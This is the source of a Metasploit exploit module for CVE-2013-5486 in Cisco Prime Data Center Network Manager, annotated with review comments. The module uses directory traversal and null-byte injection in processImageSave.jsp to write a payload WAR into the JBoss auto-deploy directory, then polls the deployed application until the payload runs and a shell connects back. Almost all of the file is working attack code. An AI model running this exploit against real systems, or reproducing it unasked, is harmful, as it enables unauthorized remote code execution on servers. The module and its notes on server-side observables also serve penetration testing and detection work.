GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/cisco_dcnm_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
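# Exploit module for CVE-2013-5486 in Cisco Prime Data Center Network Manager.
#
# processImageSave.jsp takes a `chartid` parameter that ends up as a file
# path. The module uses directory traversal plus a trailing %00 to write a WAR
# into the JBoss auto-deploy directory, then requests the deployed application.
#
# Server-side observables, as built by the requests below: a POST to
# cues_utility/charts/processImageSave.jsp whose chartid contains "../" and
# ends in "%00", a new randomly named .war in the deploy directory, and GET
# requests to a context path carrying that same random name.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Registers module metadata and the two user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
        'Description' => %q{
          This module exploits a code execution flaw in Cisco Data Center Network Manager. The
          vulnerability exists in processImageSave.jsp, which can be abused through a directory
          traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
          application server feature is used to achieve remote code execution. This module has been
          tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
          (64 bits).
        },
        'Author' => [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-5486'],
          [ 'OSVDB', '97426' ],
          [ 'ZDI', '13-254' ],
          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
        ],
        'Privileged' => true,
        'Platform' => 'java',
        'Arch' => ARCH_JAVA,
        'Targets' => [
          [
            'Cisco DCNM 6.1(2) / Java Universal',
            {
              # Relative to the directory where processImageSave.jsp stores uploads.
              'AutoDeployPath' => "../../../../../deploy",
              # Relative to the session's working directory (see comments in #exploit).
              'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-09-18',
        # NOTE(review): all three values are declared unknown, although #exploit
        # visibly writes a WAR into the JBoss deploy directory. The side-effect
        # metadata should record that on-disk artifact.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
      ]
    )
  end

  # Sends one save request to processImageSave.jsp.
  #
  # @param location [String] directory part placed in front of the file name in chartid
  # @param filename [String] file name to write
  # @param contents [String] raw file contents; sent base64-encoded, then URI-encoded
  # @return [Boolean] true only for a 200 response whose body contains "success"
  def upload_file(location, filename, contents)
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
        'method' => 'POST',
        # Parameters are sent as built here, so `data` is encoded by hand below.
        'encode_params' => false,
        'vars_post' =>
        {
          "mode" => "save",
          "savefile" => "true",
          "chartid" => "#{location}/#{filename}%00",
          "data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
        }
      }
    )

    # A missing response (timeout) counts as a failed upload.
    !res.nil? && res.code == 200 && res.body.to_s.match?(/success/)
  end

  # Banner-based version check; it sends a single GET and uploads nothing.
  #
  # The result depends only on what the landing page prints, so Detected or
  # Safe says nothing about whether the vendor fix is installed.
  #
  # @return [Exploit::CheckCode] Unknown on no response, Appears when the
  #   version string contains "6.1", Detected when only the product name (or
  #   another version) is seen, Safe otherwise
  def check
    res = send_request_cgi({
      # Fixed: the request option is 'uri', as used in #upload_file. The
      # previous 'url' key is not a request option, so TARGETURI was never
      # applied to this probe.
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    body = res.body.to_s
    return Exploit::CheckCode::Safe unless res.code == 200 && body =~ /Data Center Network Manager/

    banner = body.match(/<div class="productVersion">Version: (.*)<\/div>/)
    # Product page without a version banner: present, version undetermined.
    return Exploit::CheckCode::Detected unless banner

    version = banner[1]
    vprint_status("Cisco Prime Data Center Network Manager version #{version} found")

    # NOTE(review): the pattern is unanchored, so any version string containing
    # "6.1" reports Appears; the description lists 6.1(2) as the tested release.
    version =~ /6\.1/ ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected
  end

  # Uploads the payload WAR to the auto-deploy directory and polls the new
  # application until it answers 200 or ATTEMPTS is exhausted.
  #
  # Calls fail_with on a non-positive ATTEMPTS, a failed upload, or a request
  # that gets no response.
  def exploit
    attempts = datastore['ATTEMPTS']
    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0

    app_base = rand_text_alphanumeric(4 + rand(32 - 4))

    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
    war = payload.encoded_war({ :app_name => app_base }).to_s
    war_filename = "#{app_base}.war"
    war_location = target['AutoDeployPath']

    print_status("Uploading WAR file #{war_filename}...")
    unless upload_file(war_location, war_filename, war)
      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
    end

    # Registered only after a confirmed upload. Presumably FileDropper removes
    # the file once a session exists, so a run without a session would leave
    # the WAR in the deploy directory - confirm against the mixin.
    register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")

    attempts.times do
      # Give JBoss time to pick up and deploy the new archive.
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("Attempting to launch payload in deployed WAR...")
      res = send_request_cgi(
        {
          'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
          'method' => 'GET'
        }
      )
      # Failure. The request timed out or the server went away.
      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end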